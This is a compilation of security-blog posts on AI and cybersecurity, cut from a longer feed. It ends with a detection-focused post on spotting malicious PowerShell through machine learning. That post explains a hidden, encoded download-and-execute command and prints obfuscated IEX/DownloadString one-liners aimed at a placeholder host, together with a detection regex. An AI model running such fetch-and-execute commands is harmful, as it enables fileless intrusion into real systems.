Additionally, AI technology can pick up abnormalities within an organisation’s network and flag them more quickly than a member of the cybersecurity or IT team could; AI’s ability to understand ‘normal’ behaviour allows it to draw attention to potentially malicious, suspicious or abnormal user or device activity.
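As an illustration of that 'normal versus abnormal' idea, the sketch below fits an anomaly detector to a baseline of ordinary user activity and flags departures from it. The features and numbers are assumptions made up for the example, not output from any real product.

    # Hypothetical user-behaviour anomaly detection sketch.
    import numpy as np
    from sklearn.ensemble import IsolationForest

    rng = np.random.default_rng(1)

    # Baseline period of ordinary behaviour per user-day:
    # login hour, MB downloaded, distinct hosts touched.
    normal = np.column_stack([
        rng.normal(10, 2, 500),   # logins cluster around 10am
        rng.normal(50, 15, 500),  # roughly 50 MB downloaded
        rng.poisson(3, 500),      # a handful of hosts
    ])
    detector = IsolationForest(contamination=0.01, random_state=0).fit(normal)

    # New activity: one ordinary day, and one 3am mass-download spree.
    today = np.array([[9.5, 55, 4],
                      [3.0, 900, 40]])
    for row, verdict in zip(today, detector.predict(today)):
        print(row, "ANOMALOUS" if verdict == -1 else "normal")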

As with most new technologies, for each positive there is an equal negative. AI could be configured by hackers to learn the specific defences and tools that it runs up against, which would give way to larger and more successful data breaches. Viruses could be created to host this type of AI, producing more malware that can bypass even more advanced security implementations. This approach would likely be favoured by hackers as they don’t even need to tamper with the data itself - they could work out the features of the code a model is using and mirror it with their own. In this particular case, the tables would be turned and organisations could find themselves in sticky situations if they can’t keep up with hackers.

Organisations must be wary that they don’t adopt AI technology in cybersecurity ‘just because.’ As attack surfaces expand and hackers become more sophisticated, cybersecurity strategies must evolve to keep up. AI contributes to this expanding attack surface so when it comes down to deployment, the benefits must be weighed up against the potential negatives. A robust, defence-in-depth Information Assurance strategy is still needed to form the basis of any defence strategy to keep data safe.



Paul German, CEO, Certes Networks

Machine learning trumps AI for security analysts

While machine learning is one of the biggest buzzwords in cybersecurity and the tech industry in general, the phrase itself is often overused and mis-applied, leaving many to have their own, incorrect definition of what machine learning actually is. So, how do you cut through all the noise to separate fact from fiction? And how can this tool be best applied to security operations? What is machine learning? Machine learning (ML) is an algorithm that … More

The post Machine learning trumps AI for security analysts appeared first on Help Net Security.

McAfee Blogs: Artificial Intelligence & Your Family: The Wows & the Risks

Am I the only one? When I hear or see the term Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

And there’s plenty of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Service Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post Artificial Intelligence & Your Family: The Wows & the Risks appeared first on McAfee Blogs.



McAfee Blogs


Stay Ahead of the Growing Security Analytics Market With These Best Practices

As breach rates climb and threat actors continue to evolve their techniques, many IT security teams are turning to new tools in the fight against corporate cybercrime. The proliferation of internet of things (IoT) devices, network services and other technologies in the enterprise has expanded the attack surface every year and will continue to do so. This evolving landscape is prompting organizations to seek out new ways of defending critical assets and gathering threat intelligence.

The Security Analytics Market Is Poised for Massive Growth

Enter security analytics, which mixes threat intelligence with big data capabilities to help detect, analyze and mitigate targeted attacks and persistent threats from outside actors as well as those already inside corporate walls.

“It’s no longer enough to protect against outside attacks with perimeter-based cybersecurity solutions,” said Hani Mustafa, CEO and co-founder of Jazz Networks. “Cybersecurity tools that blend user behavior analytics (UBA), machine learning and data visibility will help security professionals contextualize data and demystify human behavior, allowing them to predict, prevent and protect against insider threats.”

Security analytics can also provide information about attempted breaches from outside sources. Analytics tools work together with existing network defenses and strategies and offer a deeper view into suspicious activity, which could be missed or overlooked for long periods due to the massive amount of superfluous data collected each day.

Indeed, more security teams are seeing the value of analytics as the market appears poised for massive growth. According to Global Market Insights, the security analytics market was valued at more than $2 billion in 2015, and it is estimated to grow by more than 26 percent over the coming years — exceeding $8 billion by 2023. ABI Research put that figure even higher, estimating that the need for these tools will drive the security analytics market toward a revenue of $12 billion by 2024.

Why Are Security Managers Turning to Analytics?

For most security managers, investment in analytics tools represents a way to fill the need for more real-time, actionable information that plays a role in a layered, robust security strategy. Filtering out important information from the massive amounts of data that enterprises deal with daily is a primary goal for many leaders. Businesses are using these tools for many use cases, including analyzing user behavior, examining network traffic, detecting insider threats, uncovering lost data, and reviewing user roles and permissions.

“There has been a shift in cybersecurity analytics tooling over the past several years,” said Ray McKenzie, founder and managing director of Red Beach Advisors. “Companies initially were fine with weekly or biweekly security log analytics and threat identification. This has morphed to real-time analytics and tooling to support vulnerability awareness.”

Another reason for analytics is to gain better insight into the areas that are most at risk within an IT environment. But in efforts to cull important information from a wide variety of potential threats, these tools also present challenges to the teams using them.

“The technology can also cause alert fatigue,” said Simon Whitburn, global senior vice president, cybersecurity services at Nominet. “Effective analytics tools should have the ability to reduce false positives while analyzing data in real-time to pinpoint and eradicate malicious activity quickly. At the end of the day, the key is having access to actionable threat intelligence.”

Personalization Is Paramount

Obtaining actionable threat intelligence means configuring these tools with your unique business needs in mind.

“There is no ‘plug and play’ solution in the security analytics space,” said Liviu Arsene, senior cybersecurity analyst at Bitdefender. “Instead, the best way forward for organizations is to identify and deploy the analytics tools that best fit an organization’s needs.”

When evaluating security analytics tools, consider the company’s size and the complexity of the challenges the business hopes to address. Organizations with complex environments may need capabilities such as flexible deployment models, broad scope and depth of analysis, forensics, and monitoring, reporting and visualization. Others may have simpler needs, with minimal overhead and a smaller focus on forensics and advanced persistent threats (APTs).

“While there is no single analytics tool that works for all organizations, it’s important for organizations to fully understand the features they need for their infrastructure,” said Arsene.

Best Practices for Researching and Deploying Analytics Solutions

Once you have established your organization’s needs and goals for investing in security analytics, there are other important considerations to keep in mind.

Emphasize Employee Training

Chief information security officers (CISOs) and security managers must ensure that their staff is prepared to use the tools at the outset of deployment. Training employees to make sense of the information amid the noise of alerts is critical.

“Staff need to be trained to understand the results being generated, what is important, what is not and how to respond,” said Steve Tcherchian, CISO at XYPRO Technology Corporation.

Look for Tools That Can Change With the Threat Landscape

Security experts know that criminals are always one step ahead of technology and tools and that the threat landscape is always evolving. It’s essential to invest in tools that can handle relevant data needs both now and several years down the line. In other words, the solutions must evolve alongside the techniques and methodologies of threat actors.

“If the security tools an organization uses remain stagnant in their programming and update schedule, more vulnerabilities will be exposed through other approaches,” said Victor Congionti of Proven Data.

Understand That Analytics Is Only a Supplement to Your Team

Analytics tools are by no means a replacement for your security staff. Having analysts who can understand and interpret data is necessary to get the most out of these solutions.

Be Mindful of the Limitations of Security Analytics

Armed with security analytics tools, organizations can benefit from big data capabilities to analyze data and enhance detection with proactive alerts about potential malicious activity. However, analytics tools have their limitations, and enterprises that invest must evaluate and deploy these tools with their unique business needs in mind. The data obtained from analytics requires context, and trained staff need to understand how to make sense of important alerts among the noise.

The post Stay Ahead of the Growing Security Analytics Market With These Best Practices appeared first on Security Intelligence.

CIPL Publishes Report on Artificial Intelligence and Data Protection in Tension

The Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP recently published the first report in its project on Artificial Intelligence (“AI”) and Data Protection: Delivering Sustainable AI Accountability in Practice.

The report, entitled “Artificial Intelligence and Data Protection in Tension,” aims to describe in clear, understandable terms:

  • what AI is and how it is being used all around us today;
  • the role that personal data plays in the development, deployment and oversight of AI; and
  • the opportunities and challenges presented by AI to data protection laws and norms.

The report describes AI capabilities and examples of public and private uses of AI applications in society. It also looks closely at various tensions that exist between well-established data protection principles and the requirements of AI technologies.

The report concludes with six general observations:

  • Not all AI is the same;
  • AI is widely used in society today and is of significant economic and societal value;
  • AI requires substantial amounts of data to perform optimally;
  • AI requires data to identify and guard against bias;
  • The role of human oversight of AI is likely to change, and will need to, for AI to deliver the greatest benefit to humankind; and
  • AI challenges some requirements of data protection law.

The report is a level-setting backdrop for the next phase of CIPL’s AI project – working with data protection officials, industry leaders and others to identify practical ways of addressing challenges and harnessing the opportunities presented by AI and data protection.

After this next phase, CIPL expects to release a second report, Delivering Sustainable AI Accountability in Practice. That report will address some of the critical tools that companies and organizations are starting to develop and implement to promote accountability for their use of AI within existing legal and ethical frameworks, as well as reasonable interpretations of existing principles and laws that regulators can employ to achieve efficient, effective privacy protection in the AI context. It will also touch on considerations for developing data protection laws that are cognizant of AI and other innovative technologies.

To read the first report in detail and to learn more about the observations detailed above, please see the full report.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars show the number of attacks detected; the red curve is the exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates that the following chunk of text is a Base64-encoded command (a minimal decoding sketch follows the list).
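As an aside, recovering the plaintext from an -encodedcommand payload is straightforward, because PowerShell Base64-encodes the UTF-16LE bytes of the script text. The following is a minimal sketch in Python; the sample payload is hypothetical and merely stands in for the one in Figure 3:

    import base64

    def decode_encoded_command(b64: str) -> str:
        """Decode a PowerShell -EncodedCommand payload: Base64 over
        the UTF-16LE bytes of the script text."""
        return base64.b64decode(b64).decode("utf-16-le")

    # Hypothetical payload for illustration; encodes: Write-Output 'hi'
    payload = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode()
    print(decode_encoded_command(payload))  # -> Write-Output 'hi'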

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command reveals stealthy, fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring method downloads the contents from <url> into a memory buffer, which IEX in turn executes.

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.
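To make the combinatorial-complexity and cost-asymmetry points concrete, here is a small sketch with hypothetical obfuscated variants, showing how cheaply a naive signature can be sidestepped:

    import re

    # A naive signature: flag any command that invokes Invoke-Expression.
    signature = re.compile(r"invoke-expression|iex", re.IGNORECASE)

    commands = [
        "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')",
        # Backtick escaping: PowerShell ignores the backtick, the regex does not.
        "I`EX (New-Object Net.WebClient).DownloadString('http://example.test/a')",
        # Wildcarded command resolution at runtime: no literal 'iex' substring at all.
        "& (Get-Command In*ke-Expr*) 'calc'",
    ]

    for cmd in commands:
        print(f"detected={bool(signature.search(cmd))}  {cmd}")
    # Only the first variant matches; each trivial rewrite forces a new rule.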

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set comprising malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its root form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.
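As a rough illustration of the idea (a sketch, not FireEye's implementation), a character trie built over the canonical parameter names can map any unambiguous abbreviation to its canonical token:

    class TrieStemmer:
        """Map abbreviated PowerShell tokens (e.g. 'nol', 'nolo') to a
        canonical form ('nologo') by walking a character trie."""

        def __init__(self, canonical_tokens):
            self.root = {}
            for token in canonical_tokens:
                node = self.root
                for ch in token:
                    node = node.setdefault(ch, {})
                    # Each prefix along the path stems to this token; truly
                    # ambiguous prefixes would need extra disambiguation.
                    node["$stem"] = token

        def stem(self, token):
            node, token = self.root, token.lower()
            for ch in token:
                if ch not in node:
                    return token  # unknown token: leave it unchanged
                node = node[ch]
            return node.get("$stem", token)

    stemmer = TrieStemmer(["nologo", "noninteractive", "noprofile"])
    for t in ["NOL", "NOLO", "NOLOGO", "NonI"]:
        print(t, "->", stemmer.stem(t))  # each stems to its canonical form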


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed comprises the following key modules:

  • Decoder – detects and decodes any encoded text.
  • Named Entity Recognition (NER) – detects and recognizes entities such as IPs, URLs, email addresses, registry keys, etc.
  • Tokenizer – tokenizes the PowerShell command into a list of tokens.
  • Stemmer – stems tokens into semantically identical tokens, using the trie.
  • Vocabulary Vectorizer – vectorizes the list of tokens into a machine learning-friendly format.
  • Supervised classifier – binary classification algorithms: kernel support vector machines, gradient boosted trees, and deep neural networks.
  • Reasoning – explains why the prediction was made, enabling analysts to validate predictions.
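As a loose approximation of the vectorizer and classifier stages (the production feature set and model are not public, and the toy corpus below is hypothetical), tokenized and stemmed commands could be vectorized and fed to gradient boosted trees with scikit-learn:

    from sklearn.ensemble import GradientBoostingClassifier
    from sklearn.feature_extraction.text import TfidfVectorizer

    # Hypothetical pre-tokenized, stemmed corpus with labels
    # (1 = malicious, 0 = benign); a real training set is far larger.
    corpus = [
        "iex new-object net.webclient downloadstring <URL>",
        "get-childitem -path c:\\logs -recurse",
    ]
    labels = [1, 0]

    # Vectorize the token sequences; tokens are already whitespace-separated.
    vectorizer = TfidfVectorizer(token_pattern=r"\S+")
    X = vectorizer.fit_transform(corpus)

    # One of the binary classifiers listed above.
    clf = GradientBoostingClassifier().fit(X, labels)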

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model
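Chaining these steps together, a minimal sketch of the scoring path might look as follows, reusing the hypothetical decode_encoded_command, stemmer, vectorizer and clf objects from the earlier fragments:

    import re

    def predict_malicious_probability(command: str) -> float:
        # 1. Detect and decode any Base64-encoded payload (simplified detection).
        m = re.search(r"-encodedcommand\s+(\S+)", command, re.IGNORECASE)
        if m:
            command = decode_encoded_command(m.group(1))
        # 2. Entity recognition, reduced here to replacing URLs with a placeholder.
        command = re.sub(r"https?://\S+", "<URL>", command)
        # 3. Tokenize, then 4. stem each token via the trie.
        tokens = [stemmer.stem(t) for t in command.split()]
        # 5. Vectorize and score with the supervised model.
        X = vectorizer.transform([" ".join(tokens)])
        return clf.predict_proba(X)[0, 1]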


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are based on Boolean expressions and regexes, the NLP model has lower operational cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands using implicitly learned non-linear combinations of patterns, which increases the cost for adversaries to bypass it.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.